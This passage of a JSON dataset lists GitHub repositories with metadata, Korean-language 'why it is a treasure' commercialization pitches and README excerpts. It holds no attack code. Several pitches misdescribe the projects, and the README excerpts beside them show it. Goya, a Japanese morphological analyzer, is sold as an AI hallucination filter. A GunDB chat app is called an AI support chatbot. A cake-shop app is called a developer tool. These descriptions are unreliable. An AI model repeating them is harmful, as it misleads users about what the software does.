V1.5.8（2020-09-02）\r\n\r\n1.tui-navigation-bar组件优化，可设置背景透明 【设置该属性，则背景透明，只出现内容，isOpacity和maxOpacity失效】\r\n\r\n2","composite_score":0.5827,"license_safety_tag":"safe"},{"name":"ZJU-FAST-Lab/EVA-planner","github_url":"https://github.com/ZJU-FAST-Lab/EVA-planner","stars":5,"language":"C++","license":"unknown","abandonment_months":30,"description":"# EVA-planner 상용화 분석\n\n## 왜 보물인가\n로봇이나 드론이 복잡한 작업을 스스로 계획하고 판단할 수 있도록 도와주는 기술로, 자동화 산업의 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **자동 배송 로봇 서비스**: 물류 회사가 배송 경로를 자동으로 최적화하는 SaaS 솔루션\n2. **드론 촬영 플랫폼**: 건설·부동산 업체가 드론의 비","readme_excerpt":"# EVA-planner\n\n**EVA**-planner: an **E**n**V**ironmental **A**daptive Gradient-based Local Planner for Quadrotors.\n\n## 0. Overview\n**Author**: [Lun Quan](http://zju-fast.com/lun-quan/), Zhiwei Zhang, Xingguang Zhong, Chao Xu and [Fei Gao](http://zju-fast.com/fei-gao/) from [ZJU FAST Lab](http://zju-fast.com/).\n\n**Related Paper**: [EVA-Planner: Environmental Adaptive Quadrotor Planning](https://ieeexplore.ieee.org/document/9561759), Lun Quan, Zhiwei Zhang, Chao Xu and Fei Gao accepted by 2021 IEEE International Conference on Robotics and Automation (ICRA).\n\n**Video Links**: [Google](https://www.youtube.com/watch?v=HcwBNcah0eo&t=4s), [Bilibili](https://www.bilibili.com/video/BV1Zz4y1C7rt)(for Mainland China)\n\n## 1. File Structrue\n- All planning algorithms along with other key modules, such as mapping, are implemented in **adaptive_planner**\n    - **path_searching**: includes multi-layer planner (A*, low-MPC and high-MPCC).\n\n    - **path_env**: includes online mapping algorithms for the p","composite_score":0.5825,"license_safety_tag":"unknown"},{"name":"kefu-chat/client","github_url":"https://github.com/kefu-chat/client","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":35,"description":"# kefu-chat/client 기술 자산 분석\n\n## 왜 보물인가\n고객 상담을 자동화할 수 있는 AI 챗봇 기술로, 기업들이 24시간 고객 응답 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 쇼핑몰과 통신사를 위한 구독형 AI 상담원 서비스로 월 이용료 모델 운영\n2. **내부 업무 도구**: 대기","readme_excerpt":"# GunDB Chat\n\nMade with ♥️ by Koen van Gilst using svelte and gunDB.\n\n## Credits\n\n- Icons made by <a href=\"https://www.flaticon.com/authors/dave-gandy\" title=\"Dave Gandy\">Dave Gandy</a> from <a href=\"https://www.flaticon.com/\" title=\"Flaticon\"> www.flaticon.com</a>\n","composite_score":0.5825,"license_safety_tag":"unknown"},{"name":"ashutosh1919/neuro-symbolic-sudoku-solver","github_url":"https://github.com/ashutosh1919/neuro-symbolic-sudoku-solver","stars":28,"language":"Python","license":"Apache-2.0","abandonment_months":54,"description":"# Neuro-Symbolic Sudoku Solver 상용화 분석\n\n## 왜 보물인가\nAI와 논리를 결합해 복잡한 문제를 체계적으로 푸는 기술로, 게임을 넘어 업무 자동화와 의사결정 지원에 광범위하게 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 퍼즐 풀이 SaaS 서비스**\n스도쿠, 크로스워드, 논리 게임 앱에 내장된 자동 풀이 기능으로 월","readme_excerpt":"# Neuro-Symbolic Sudoku Solver\nPyTorch implementation for the Neuro-Symbolic Sudoku Solver leveraging the power of Neural Logic Machines (NLM). **Please note that this is not an officially supported Google product.**  This project is a direct application of work done as part of original [NLM project](https://github.com/google/neural-logic-machines). We have applied NLM concept to solve more complex (Solving Sudoku) problems. We have also described the internal workings in [Medium Blog](https://medium.com/@ashutosh1919/creating-neuro-symbolic-sudoku-solver-cc94c431d10b).\n\n<div align=\"center\">\n  <img src=\"_assets/framework.png\" width=\"100%\">\n</div>  \n\n:star: Star us on GitHub — it helps!\n\nNeural Logic Machine (NLM) is a neural-symbolic architecture for both inductive learning and logic reasoning. NLMs use tensors to represent logic predicates. This is done by grounding the predicate as\nTrue or False over a fixed set of objects. Based on the tensor representation, rules are implemented\nas","composite_score":0.5824,"license_safety_tag":"safe"},{"name":"mgleon08/instagram-crawler","github_url":"https://github.com/mgleon08/instagram-crawler","stars":11,"language":"Ruby","license":"MIT","abandonment_months":37,"description":"# Instagram 크롤러 비즈니스 분석\n\n## 왜 보물인가\n인스타그램의 실시간 데이터를 자동으로 수집할 수 있어서, 수동으로 정보를 일일이 모으던 업무를 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **마케팅 분석 SaaS**: 광고주들이 자신의 경쟁사 인스타그램 게시물, 팔로워 수, 참여도를 자동으로 추적하고 리포트 받기\n- **소셜 미디어","readme_excerpt":"# Instagram Crawler\n\n[![Gem Version](https://badge.fury.io/rb/instagram-crawler.svg)](https://badge.fury.io/rb/instagram-crawler)\n[![Maintainability](https://api.codeclimate.com/v1/badges/a1625a5a812f515bdd91/maintainability)](https://codeclimate.com/github/mgleon08/instagram-crawler/maintainability)\n[![Build Status](https://travis-ci.org/mgleon08/instagram-crawler.svg?branch=master)](https://travis-ci.org/mgleon08/instagram-crawler)\n[![Coverage Status](https://coveralls.io/repos/github/mgleon08/instagram-crawler/badge.svg?branch=master)](https://coveralls.io/github/mgleon08/instagram-crawler?branch=master)\n[![security](https://hakiri.io/github/mgleon08/instagram-crawler/master.svg)](https://hakiri.io/github/mgleon08/instagram-crawler/master)\n[![MIT licensed](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/mgleon08/instagram-crawler/blob/master/LICENSE.txt)\n\n\n> The easiest way to download instagram photos, posts and videos.\n\n<img src=\"screenshots/logo.png\" width=","composite_score":0.5823,"license_safety_tag":"safe"},{"name":"EMI-Group/FaPN","github_url":"https://github.com/EMI-Group/FaPN","stars":9,"language":"C++","license":"Apache-2.0","abandonment_months":58,"description":"# EMI-Group/FaPN 저장소 분석\n\n## 왜 보물인가\n이미지 인식 기술을 빠르게 처리하는 도구로, 실시간으로 사진을 분석해야 하는 서비스들이 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소셜 미디어 이미지 필터링, 자동 콘텐츠 분류 플랫폼\n- **내부 업무 도구**: 제조업체의 품질 검사 자동화, 보안 감시","readme_excerpt":"# FaPN: Feature-aligned Pyramid Network for Dense Image Prediction [[arXiv]](https://arxiv.org/pdf/2108.07058.pdf) [[Project Page]](http://www.shihuahuang.cn/fapn/)\n\n```BibTex\n@inproceedings{\n  huang2021fapn,\n  title={{FaPN}: Feature-aligned Pyramid Network for Dense Image Prediction},\n  author={Shihua Huang and Zhichao Lu and Ran Cheng and Cheng He},\n  booktitle={International Conference on Computer Vision (ICCV)},\n  year={2021}\n}\n```\n## Overview\n\nFaPN vs. FPN           |  Before vs. After Alignment\n:-------------------------:|:-------------------------:\n<img width=\"380\" src=\"./assert/fpn_vs_fapn.png\"> |  <img width=\"400\" src=\"./assert/feat_vis.png\">\n\nThis project provides the official implementation for our ICCV2021 paper \n\"[FaPN: Feature-aligned Pyramid Network for Dense Image Prediction](https://arxiv.org/pdf/2108.07058.pdf)\" \nbased on [Detectron2](https://github.com/facebookresearch/detectron2). \nFaPN is a simple yet effective top-down pyramidal architecture to generate multi-scal","composite_score":0.5823,"license_safety_tag":"safe"},{"name":"twitter/twemproxy","github_url":"https://github.com/twitter/twemproxy","stars":7,"language":"C","license":"apache-2.0","abandonment_months":26,"description":"# twitter/twemproxy 상용화 분석\n\n## 왜 보물인가\n여러 개의 데이터베이스를 마치 하나처럼 사용할 수 있게 해주는 기술로, 대규모 서비스의 성능을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 수백만 사용자를 보유한 소셜 미디어나 메시징 플랫폼의 데이터 처리 속도 개선\n2. **내부 업무 도구**: 대","readme_excerpt":"# twemproxy (nutcracker) [![Build Status](https://github.com/twitter/twemproxy/actions/workflows/main.yml/badge.svg?branch=master)](https://github.com/twitter/twemproxy/actions/workflows/main.yml?query=branch%3Amaster)\n\n**twemproxy** (pronounced \"two-em-proxy\"), aka **nutcracker** is a fast and lightweight proxy for [memcached](http://www.memcached.org/) and [redis](http://redis.io/) protocol. It was built primarily to reduce the number of connections to the caching servers on the backend. This, together with protocol pipelining and sharding enables you to horizontally scale your distributed caching architecture.\n\n## Build\n\nTo build twemproxy 0.5.0+ from [distribution tarball](https://github.com/twitter/twemproxy/releases):\n\n    $ ./configure\n    $ make\n    $ sudo make install\n\nTo build twemproxy 0.5.0+ from [distribution tarball](https://github.com/twitter/twemproxy/releases) in _debug mode_:\n\n    $ CFLAGS=\"-ggdb3 -O0\" ./configure --enable-debug=full\n    $ make\n    $ sudo make install","composite_score":0.5818,"license_safety_tag":"safe"},{"name":"CUDEPIA/SenhorBolo-Mobile","github_url":"https://github.com/CUDEPIA/SenhorBolo-Mobile","stars":8,"language":"Dart","license":"unknown","abandonment_months":55,"description":"# SenhorBolo-Mobile 분석 보고서\n\n## 왜 보물인가\n모바일 앱 개발자들이 자주 사용하는 '센호르볼로'라는 도구를 스마트폰에서 바로 쓸 수 있게 만들어 개발 시간을 크게 단축할 수 있는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자용 SaaS 서비스**: 모바일 앱 개발자들을 위한 월 구독 기반 개발 보조 도구로 운영\n2. **개","readme_excerpt":"# Senhor Bolo - Mobile\n\n<img src=\"https://i.imgur.com/nVPrJBM.png\" alt=\"Imagem do projeto\">\n\n> O app do Senhor Bolo funciona como uma loja virtual, permitindo que o usuário compre bolos, use cupons e acompanhe a entrega deles, semelhante a um Ifood. Desenvolvido em Flutter, o que permite ter o mesmo código para o aplicativo no IOS e no Android.\n\n### Etapas do desenvolvimento\n\n- [X] Fazer as telas do APP\n- [X] Conexão com o banco de dados\n- [X] POO\n- [X] Testes de qualidade\n- [X] Lançamento\n\n### Features\n\n- _Bolo Personalizado_: Permite a criação e compra de um bolo personalizado, sendo possível escolher a massa, recheio, cobertura e confeitos do mesmo.\n- _Pagamento_: Todos os cartões de créditos que o usuário adiciona no APP são armazenados localmente, criptografados por uma senha aletória gerada na execução do APP, portanto, ninguém tem acesso as informações de pagamento, a não ser o usuário!\n- _Perfil_: Permite a adição de endereços por CEP, edição da senha e outras informações da co","composite_score":0.5818,"license_safety_tag":"unknown"},{"name":"Harry-Chen/InfMoE","github_url":"https://github.com/Harry-Chen/InfMoE","stars":7,"language":"C++","license":"MIT","abandonment_months":61,"description":"# InfMoE 저장소 분석\n\n## 왜 보물인가\n복잡한 문제를 여러 단계로 나누어 더 정확하게 풀 수 있는 AI 기술로, 의료·금융·법률 등 고난도 의사결정이 필요한 분야에서 실수를 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 법무팀 대상 계약서 검토 자동화 플랫폼 (조항별 리스크 단계 분석)\n2. **내부 업무 도구**:","readme_excerpt":"# InfMoE\n\nInference framework for MoE-based models, based on a TensorRT custom plugin\nnamed `MoELayerPlugin` (including Python binding) that can run inference of MoE layers with any sub-layer on NVIDIA GPUs with minimal memory consumption.\n\nInfMoE is open-sourced under [MIT License](LICENSE).\n\n## Installation\n\nDependencies:\n\n* CUDA (>=10.2)\n* cuDNN (>=8.0, corresponding to CUDA version)\n* TensorRT (>=7.0, corresponding to CUDA & cuDNN version)\n* zlib (to read `npz` files)\n* meson & ninja (building system)\n\n### Python (recommended)\n\nTo use TensorRT in Python, you need to first install:\n\n* TensorRT pip package (either from downloaded TensorRT package or from PyPI as `nvidia-tensorrt`, see <https://docs.nvidia.com/deeplearning/tensorrt/install-guide/index.html#installing-pip>)\n* PyCUDA\n\nSimply you could run `python3 -m pip install -r requirements.txt`.\n\nNote: If you install `nvidia-tensorrt` from PyPI (but not from downloaded TensorRT package), you **MUST** ensure the version of TensorRT ","composite_score":0.5818,"license_safety_tag":"safe"},{"name":"rest-feeds/rest-feeds","github_url":"https://github.com/rest-feeds/rest-feeds","stars":5,"language":"","license":"Apache-2.0","abandonment_months":53,"description":"# rest-feeds/rest-feeds 분석 보고서\n\n## 왜 보물인가\n인터넷의 실시간 정보들을 자동으로 수집해서 정리해주는 도구로, 뉴스·소셜미디어·시장정보 등을 빠르게 모니터링해야 하는 비즈니스에서 시간과 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **뉴스 큐레이션 SaaS**: 특정 주제의 최신 뉴스를 자동으로 모아 구독자에게","readme_excerpt":"__DEPRECATION NOTICE__:  \n___rest-feeds_ is deprecated and will not be further developed. Use [http-feeds](https://www.http-feeds.org) instead.__\n\n\n# rest-feeds\n\nAsynchronous data replication and event streaming with plain REST/HTTP.\n\n## 1-Minute Overview\n\nA REST feed provides access to resources in a _chronological sequence of changes_.\n\n```\nGET /movies\nAccept: application/json\n\n200 OK\nContent-Type: application/cloudevents-batch+json\n[{\n  \"specversion\" : \"1.0\",\n  \"type\" : \"org.example.movie\",\n  \"source\" : \"/movies\",\n  \"id\": \"11b592ae-490f-4c07-a174-04db33c2df70\",\n  \"time\": \"2019-12-16T08:41:519Z\",\n  \"subject\": \"18\",\n  \"data\": {\n    \"original_title\":\"The Fifth Element\",\n    \"popularity\":26.163\n  }\n},{\n  \"specversion\" : \"1.0\",\n  \"type\" : \"org.example.movie\",\n  \"source\" : \"/movies\",\n  \"id\": \"64e11a7a-0e40-426c-8d81-259d6f6ab74e\",\n  \"time\": \"2019-12-16T09:12:421Z\",\n  \"subject\": \"12\",\n  \"data\": {\n    \"original_title\":\"Finding Nemo\",\n    \"popularity\":23.675\n  }\n}]\n```\n\nThe number of items r","composite_score":0.5817,"license_safety_tag":"safe"},{"name":"Leko/goya","github_url":"https://github.com/Leko/goya","stars":9,"language":"Rust","license":"MIT","abandonment_months":54,"description":"# Leko/goya 상용화 분석\n\n## 왜 보물인가\nAI가 생성한 답변에서 거짓 정보를 자동으로 감지하고 걸러내는 기술로, 신뢰할 수 있는 AI 서비스를 만드는 데 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 챗봇 SaaS 서비스**\n고객 상담, 교육 플랫폼 등에서 AI 챗봇이 틀린 답변을 주는 것을 자동으로 막아 서비스 신뢰도를 높","readme_excerpt":"# Goya\n\n[![goya at crates.io](https://img.shields.io/crates/v/goya.svg)](https://crates.io/crates/goya)\n[![goya at docs.rs](https://docs.rs/goya/badge.svg)](https://docs.rs/goya)\n\nGoya is a Japanese Morphological Analyzer written in Rust.  \nThe main goal is to compile to WebAssembly for morphological analysis in browsers and other JavaScript runtimes. In addition, it can be used with the CLI and Rust.\n\n[Try Goya playground](https://goya.pages.dev/). It uses the Goya-wasm from WebWorker.\n\n## Getting started\n\n### Fetch the latest IPA dictionary\n\nDownload the latest IPA dictionary from [the official Mecab website](https://taku910.github.io/mecab/) and unzip it.\n\n### Install Goya CLI\n\n```\ncargo install goya-cli\n```\n\n### Compile the IPA dictionary\n\nCompile the IPA dictionary to generate a binary dictionary for morphological analysis. It may take a few minutes.\n\n```\ngoya compile /path/to/ipadic\n```\n\nThe binary dictionary will be generated in the `~/.goya` directory by default. You can change","composite_score":0.5816,"license_safety_tag":"safe"},{"name":"cyrildiagne/ar-cutpaste","github_url":"https://github.com/cyrildiagne/ar-cutpaste","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":39,"description":"# AR Cut & Paste 상용화 분석\n\n## 왜 보물인가\n스마트폰 카메라로 찍은 물건을 자동으로 오려내서 다른 사진에 붙일 수 있는 기술로, 복잡한 편집 작업을 누구나 쉽게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 사진 편집 웹사이트에서 \"1초 배경 제거 및 합성\" 기능으로 월 9.99달러에 판매\n2. **내","readme_excerpt":"# AR Cut & Paste\n\nAn AR+ML prototype that allows cutting elements from your surroundings and pasting them in an image editing software.\n\nAlthough only Photoshop is being handled currently, it may handle different outputs in the future.\n\nDemo & more infos: [Thread](https://twitter.com/cyrildiagne/status/1256916982764646402)\n\n⚠️ This is a research prototype and not a consumer / photoshop user tool.\n\n**Update 2020.05.11:** If you're looking for an easy to use app based on this research, head over to https://clipdrop.co\n\n## Modules\n\nThis prototype runs as 3 independent modules:\n\n- **The mobile app**\n\n  - Check out the [/app](/app) folder for instructions on how to deploy the app to your mobile.\n\n- **The local server**\n\n  - The interface between the mobile app and Photoshop.\n  - It finds the position pointed on screen by the camera using [screenpoint](https://github.com/cyrildiagne/screenpoint)\n  - Check out the [/server](/server) folder for instructions on configuring the local server\n\n- *","composite_score":0.5813,"license_safety_tag":"safe"},{"name":"Meituan-Dianping/mpvue","github_url":"https://github.com/Meituan-Dianping/mpvue","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":52,"description":"# mpvue 저장소 분석\n\n## 왜 보물인가\n美團(중국 최대 배달 앱)과 點評(리뷰 플랫폼)이 만든 기술로, 한 번의 코드 작성으로 여러 플랫폼(웹, 모바일 앱)에서 동시에 작동하는 앱을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **배달·주문 SaaS**: 소규모 음식점을 위한 자체 주문 앱 플랫폼으로 제공 (월 구독료 수익)\n2. **멀티채널","readme_excerpt":"<p align=\"center\"><a href=\"http://mpvue.com\" target=\"_blank\" rel=\"noopener noreferrer\"><img width=\"100\" src=\"http://mpvue.com/assets/logo.png\" alt=\"mpvue logo\"></a></p>\n<p align=\"center\">\n   <a href=\"https://www.npmjs.com/package/mpvue\"><img src=\"https://img.shields.io/npm/v/mpvue.svg?style=flat\" alt=\"npm\"></a>\n   <a href=\"https://www.npmjs.com/package/mpvue\"><img src=\"https://img.shields.io/npm/dm/mpvue.svg?style=flat\" alt=\"npm\"></a>\n </p>\n\n# mpvue\n> Vue.js 小程序版, fork 自 [vuejs/vue@2.4.1](https://github.com/vuejs/vue)，保留了 vue runtime 能力，添加了小程序平台的支持。\n\n\n`mpvue` 是一个使用 [Vue.js](https://vuejs.org) 开发小程序的前端框架，目前支持 `微信小程序`、`百度智能小程序`，`头条小程序` 和 `支付宝小程序`。 框架基于 `Vue.js`，修改了的运行时框架 runtime 和代码编译器 compiler 实现，使其可运行在小程序环境中，从而为小程序开发引入了 `Vue.js` 开发体验。\n\n## mpvue 2.0\n\nmpvue 2.0 开始正式支持 **百度智能小程序**、**头条小程序** 和 **支付宝小程序**，使用 `mpvue-quickstart` 项目模板新创建的项目，将默认升级到 2.0。老项目可继续使用原有版本。详情请参见 [**mpvue 2.0 升级指南**](https://github.com/Meituan-Dianping/mpvue/releases/tag/2.0.0)\n\n**新版本的问题或建议，有请各位关注者及时反馈，mpvue 2.0 祝大家节日快乐","composite_score":0.5813,"license_safety_tag":"safe"},{"name":"wiseodd/generative-models","github_url":"https://github.com/wiseodd/generative-models","stars":11,"language":"Python","license":"Unlicense","abandonment_months":26,"description":"# wiseodd/generative-models 저장소 분석\n\n## 왜 보물인가\nAI가 그림, 글, 음성 등을 직접 만드는 기술을 누구나 사용할 수 있도록 정리해놓은 실용적인 설명서입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 콘텐츠 자동 생성 SaaS**: 중소 마케팅 회사가 이 코드를 기반으로 \"클릭 한 번에 광고 이미지 생성\" 서비스 구축\n2. ","readme_excerpt":"# Generative Models\nCollection of generative models, e.g. GAN, VAE in Pytorch and Tensorflow.\nAlso present here are RBM and Helmholtz Machine.\n\n## Note:\nGenerated samples will be stored in `GAN/{gan_model}/out` (or `VAE/{vae_model}/out`, etc) directory during training.\n\n## What's in it?\n\n#### Generative Adversarial Nets (GAN)\n  1. [Vanilla GAN](https://arxiv.org/abs/1406.2661)\n  2. [Conditional GAN](https://arxiv.org/abs/1411.1784)\n  3. [InfoGAN](https://arxiv.org/abs/1606.03657)\n  4. [Wasserstein GAN](https://arxiv.org/abs/1701.07875)\n  5. [Mode Regularized GAN](https://arxiv.org/abs/1612.02136)\n  6. [Coupled GAN](https://arxiv.org/abs/1606.07536)\n  7. [Auxiliary Classifier GAN](https://arxiv.org/abs/1610.09585)\n  8. [Least Squares GAN](https://arxiv.org/abs/1611.04076v2)\n  9. [Boundary Seeking GAN](https://arxiv.org/abs/1702.08431)\n  10. [Energy Based GAN](https://arxiv.org/abs/1609.03126)\n  11. [f-GAN](https://arxiv.org/abs/1606.00709)\n  12. [Generative Adversarial Parallelization](","composite_score":0.5808,"license_safety_tag":"unknown"},{"name":"polaris1119/The-Golang-Standard-Library-by-Example","github_url":"https://github.com/polaris1119/The-Golang-Standard-Library-by-Example","stars":7,"language":"Go","license":"unknown","abandonment_months":38,"description":"# The Golang Standard Library by Example 분석\n\n## 왜 보물인가\nGo라는 프로그래밍 언어의 기본 도구들을 예제와 함께 설명하는 학습 교재로, 프로그래머들이 빠르게 실무에 적용할 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: Go 언어를 사용하는 개발사들을 위한 구독형 온라인 교육 플랫폼\n- *","readme_excerpt":"# 《Go语言标准库》The Golang Standard Library by Example #\r\n\r\nGolang标准库。对于程序员而言，标准库与语言本身同样重要，它好比一个百宝箱，能为各种常见的任务提供完美的解决方案。以示例驱动的方式讲解Golang的标准库。\r\n\r\n标准库基于最新版本Go。注：目前 Go 标准库文档并没有标识某个 API 基于哪个版本的 Go，将来会加上这部分 [issue](https://github.com/golang/go/issues/5778)。\r\n\r\n讲解中涉及到特定操作系统时，针对的都是 Linux/amd64。Go 中相关系统调用在 Linux 下，对于同一个系统调用，如果有对应的 `at` 版本，使用的都是 `at` 版本，如 `open` 系统调用使用都是 `openat`。更多信息参考 [Go语言中文网博客中关于系统调用的文章](http://blog.studygolang.com)。\r\n\r\n## 交流 ##\r\n\r\n欢迎大家加入QQ群：192706294 《Go语言实现与标准库》交流群\r\n\r\nGo语言构建的 Go语言中文网：[http://studygolang.com](http://studygolang.com)\r\n\r\n关注作者公众号，加微信好友、进微信交流群。\r\n\r\n![](polarisxu-qrcode-small.jpg)\r\n\r\n## 阅读 ##\r\n\r\n为了更方便阅读，Go语言中文网搭建了阅读平台，可以更友好的在线阅读。\r\n\r\n[Go语言中文网——Go语言标准库](http://books.studygolang.com/The-Golang-Standard-Library-by-Example)\r\n\r\n## 捐赠 ##\r\n\r\n如果您觉得本书对您有帮助，通过微信或支付宝捐赠作者，金额随意！\r\n\r\n**由于无法从支付方获取支付者信息，请在支付的留言备注功能中附上 Go语言中文网账户的昵称等信息，以便我们记录！**\r\n\r\n## 目录 ##\r\n[目录](directory.md)\r\n## 贡献者 ##\r\n\r\n[hikerell](https://github.com/hikerell)\r\n\r\n## 反馈 ##\r\n\r\n由于本人能力有限，书中难免有写的不对之处，且目前所写内容没有经过校正。如果阅读过程中有","composite_score":0.5802,"license_safety_tag":"unknown"},{"name":"PaddlePaddle/Research","github_url":"https://github.com/PaddlePaddle/Research","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":22,"description":"# PaddlePaddle/Research 기술 분석\n\n## 왜 보물인가\n컴퓨터가 스스로 세상을 이해하고 미래를 예측하는 능력을 개발하는 핵심 연구 자료로, 자율주행차·로봇·영상분석 등 미래 산업의 기초가 되는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 영상분석 SaaS**: 보안카메라나 드론 영상에서 이상 상황을 자동으로 감지하고 경고하는 클","readme_excerpt":"# Research\n\n发布基于飞桨的前沿研究工作，包括CV、NLP、KG、STDM等领域的顶会论文和比赛冠军模型。\n\n## 目录\n* [计算机视觉(Computer Vision)](#计算机视觉)\n* [自然语言处理(Natrual Language Processing)](#自然语言处理)\n* [知识图谱(Knowledge Graph)](#知识图谱)\n* [时空数据挖掘(Spatial-Temporal Data-Mining)](#时空数据挖掘)\n\n## 计算机视觉\n| 任务类型     | 目录                                                         | 简介                                                         | 论文链接 |\n| ------------ | ------------------------------------------------------------ | ------------------------------------------------------------ | -------- |\n| 图像检索 | [GNN-Re-Ranking](CV/GNN-Re-Ranking/) | 基于GNN的快速图像检索Re-Ranking。 | https://arxiv.org/abs/2012.07620v2 |\n| 车流统计 | [VehicleCounting](CV/VehicleCounting/) | AICITY2020 车流统计竞赛datasetA TOP1 方案。 | - |\n| 车辆再识别 | [PaddleReid](CV/PaddleReid) | 给定目标车辆，在检索库中检索同id车辆，支持多种特征子网络。 | - |\n| 车辆异常检测 | [AICity2020-Anomaly-Detection](CV/AICity2020-Anomaly-Detection) |  在监控视频中检测车辆异常情况，例如车辆碰撞、失速等。| - |\n| 医学图像分析 | [AGEchallenge](CV/AGEchallenge) | 任务：在AS-OCT图像的公共数据集上进行闭角型分类和","composite_score":0.5801,"license_safety_tag":"safe"},{"name":"carlos8f/zenbot","github_url":"https://github.com/carlos8f/zenbot","stars":16,"language":"HTML","license":"MIT","abandonment_months":52,"description":"# Zenbot 자산 분석\n\n## 왜 보물인가\n자동으로 암호화폐를 사고팔아주는 봇으로, 24시간 쉬지 않고 투자 기회를 포착해 수익을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 암호화폐 투자자들을 위한 월 구독형 자동매매 플랫폼으로 운영\n2. **내부 업무 도구**: 암호화폐 거래소의 자체 알고리즘 매매 시스템으로 통합\n","readme_excerpt":"WARNING: project is no longer actively maintained, make sure to update any dependencies if you plan on using this in your project.\n\n![zenbot logo](assets/logo.png)\n\n> “To follow the path, look to the master, follow the master, walk with the master, see through the master, become the master.”\n> – Zen Proverb\n\n# Zenbot [![Build/Test Status](https://travis-ci.org/DeviaVir/zenbot.svg?branch=master)](https://travis-ci.org/DeviaVir/zenbot) \n\n## Description\n\nZenbot is a command-line cryptocurrency trading bot using Node.js and MongoDB. It features:\n\n- Fully-automated [technical-analysis](https://stockcharts.com/school/doku.php?id=chart_school:technical_indicators:introduction_to_technical_indicators_and_oscillators)-based trading approach\n- Full support for [Binance](https://www.binance.com/), [Bitfinex](https://www.bitfinex.com/), [Bitstamp](https://www.bitstamp.net/), [Bittrex](https://bittrex.com/), [CEX.IO](https://cex.io/), [GDAX](https://gdax.com/), [Gemini](https://gemini.com/), [HitBT","composite_score":0.5799,"license_safety_tag":"safe"},{"name":"AngularTemplates/learn-angular-from-scratch-step-by-step","github_url":"https://github.com/AngularTemplates/learn-angular-from-scratch-step-by-step","stars":227,"language":"TypeScript","license":"MIT","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.5792,"license_safety_tag":"safe"},{"name":"fuzhengwei/itstack-demo-design","github_url":"https://github.com/fuzhengwei/itstack-demo-design","stars":8,"language":"Java","license":"Apache-2.0","abandonment_months":25,"description":"# itstack-demo-design 저장소 분석\n\n## 왜 보물인가\n프로그램을 만드는 사람들이 따라야 할 '설계 규칙'을 쉽게 배우고 실무에 바로 적용할 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발자 교육 플랫폼에서 유료 강의 콘텐츠로 판매\n- **내부 업무 도구**: IT 회사의 신입 교육 프로그램으로 도입하","readme_excerpt":"# 重学 Java 设计模式\n\n> **作者：** 小傅哥，Java Developer，[:pencil2: 虫洞 · 科技栈，作者](https://bugstack.cn)，[:trophy: CSDN 博客专家](https://bugstack.blog.csdn.net)\n\n> 本代码库是作者小傅哥多年从事一线互联网```Java```开发的学习历程技术汇总，旨在为大家提供一个清晰详细的学习教程，侧重点更倾向编写Java核心内容。如果本仓库能为您提供帮助，请给予支持(关注、点赞、分享)！\n\n<br/>\n<div align=\"center\">\n    <a href=\"https://bugstack.cn\" style=\"text-decoration:none\"><img src=\"https://bugstack.cn/images/system/CodeGuide-LOGO.png?raw=true\" width=\"256px\"></a>\n</div>\n<br/>\n\n<div align=\"center\">\n\t<a href=\"https://bugstack.cn/md/other/guide-to-reading.html\"><img src=\"https://bugstack.cn/images/system/CodeGuide-Read.svg\"></a>\n\t<a href=\"https://bugstack.cn/images/personal/qrcode.png\"><img src=\"https://bugstack.cn/images/system/CodeGuide-WeiXinCode.svg\"></a>\n\t<a href=\"https://bugstack.cn/md/knowledge/pdf/2021-01-26-Java%E9%9D%A2%E7%BB%8F%E6%89%8B%E5%86%8CPDF%E4%B8%8B%E8%BD%BD.html\"><img src=\"https://bugstack.cn/images/system/CodeGuide-JavaPDF.svg\"></a>\n\t<a href=\"https://mp.weixin.qq.com/s/VthCUlT8oAJqKOoq5_NzSQ\"><img s","composite_score":0.5789,"license_safety_tag":"safe"},{"name":"Tencent/secguide","github_url":"https://github.com/Tencent/secguide","stars":5,"language":"","license":"NOASSERTION","abandonment_months":39,"description":"# Tencent/secguide 분석 보고서\n\n## 왜 보물인가\n테센트가 만든 보안 가이드는 대규모 기업의 보안 노하우를 정리한 것으로, 이를 상품화하면 중소기업들의 정보 보안 관리를 대폭 간편하게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 보안 체크리스트를 자동으로 평가해주는 웹 서비스\n2. **내부 업무 도구**","readme_excerpt":"# 代码安全指南\n\n面向开发人员梳理的代码安全指南，旨在梳理API层面的风险点并提供详实可行的安全编码方案。\n\n\n\n## 理念\n基于DevSecOps理念，我们希望用开发者更易懂的方式阐述安全编码方案，引导从源头规避漏洞。\n\n\n\n## 索引\n\n| 规范               | 最后修订日期 |\n| ------------------ | ------------ |\n| [C/C++安全指南](./C,C++安全指南.md)      | 2021-05-18   |\n| [JavaScript安全指南](./JavaScript安全指南.md#1) | 2021-05-18   |\n| [Node安全指南](./JavaScript安全指南.md#2)        | 2021-05-18   |\n| [Go安全指南](./Go安全指南.md)         | 2021-05-18   |\n| [Java安全指南](./Java安全指南.md)         | 2021-05-18   |\n| 